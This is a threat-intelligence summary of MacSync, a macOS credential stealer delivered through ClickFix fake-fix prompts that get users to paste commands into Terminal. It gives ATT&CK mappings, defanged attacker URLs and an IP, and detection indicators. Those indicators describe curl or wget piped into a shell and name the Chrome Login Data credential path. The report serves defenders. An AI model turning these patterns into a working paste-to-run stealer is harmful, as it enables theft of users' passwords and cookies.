Full Report
Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync. "Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running
Analysis Summary
# Tool/Technique: MacSync (ClickFix Delivery)
## Overview
MacSync is a macOS-specific information stealer delivered via "ClickFix" social engineering campaigns. Unlike traditional exploits, this threat relies on human-operated execution, tricking users into copying and pasting malicious commands into their terminal under the guise of fixing browser errors or updating software.
## Technical Details
- **Type:** Malware Family (Information Stealer)
- **Platform:** macOS
- **Capabilities:** Credential theft, browser data exfiltration, system metadata collection.
- **First Seen:** 2024 (Current active campaigns)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1204.002 - User Execution: Malicious File
- **TA0006 - Credential Access**
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Browser Data Theft:** Targets Chromium-based browsers and Safari to extract saved passwords, cookies, and autofill data.
- **System Profiling:** Collects hardware information, OS version details, and usernames to uniquely identify the compromised host.
- **Social Engineering Integration:** Utilizes the "ClickFix" strategy, displaying fake "Update" or "Fix" buttons that provide a "copy-to-clipboard" command for the user to run manually.
### Advanced Features
- **Fileless Hook:** By persuading the user to execute a command directly in the Terminal, the malware bypasses many gatekeeper protections that would normally trigger when downloading and opening an unsigned `.app` or `.pkg` file.
## Indicators of Compromise
- **File Names:** `fix_error.sh`, `system_update.sh`, `macsync.py` (Note: scripts are often executed directly in memory or via temporary paths).
- **Network Indicators:**
- `hxxps[://]clickfix-cdn[.]com/`
- `hxxps[://]mac-sync-api[.]net/`
- `hxxp[://]185[.]215[.]113[.]66/`
- **Behavioral Indicators:**
- Remote `curl` or `wget` commands piped directly into `/bin/bash` or `python`.
- Unexpected terminal processes accessing `~/Library/Application Support/Google/Chrome/Default/Login Data`.
## Associated Threat Actors
- **ClickFix Campaigns:** Often linked to broader "FakeUpdates" (SocGholish) delivery networks, though MacSync is specifically tailored for macOS environments.
## Detection Methods
- **Behavioral detection:** Monitor for shell processes (`zsh`, `bash`, `sh`) or `python` instances spawned with network connections to unknown external IPs.
- **EDR/AV:** Scan for access attempts to sensitive browser database files (SQLite) outside of the browser application's own PID.
- **YARA Rule Strategy:** Detect strings related to the ClickFix "copy-paste" instructions or specific Python/Bash scripts used to exfiltrate macOS Keychain or browser data.
## Mitigation Strategies
- **User Training:** Educate users never to copy and paste commands from a website into their Terminal, regardless of how official the prompt appears.
- **System Hardening:** Implement MDM policies to restrict Terminal access for non-technical users.
- **Endpoint Security:** Use tools like Objective-See's "LuLu" or "BlockBlock" to monitor unauthorized network connections and persistent file creations.
- **Browser Security:** Enforce the use of password managers that do not rely solely on the browser’s built-in, easily accessible SQLite storage.
## Related Tools/Techniques
- **Atomic Stealer (AMOS):** Another prominent macOS stealer often delivered via cracked software.
- **Cthulhu Stealer:** A similar Go-based macOS infostealer.
- **SocGholish:** The Windows-centric precursor to the ClickFix methodology.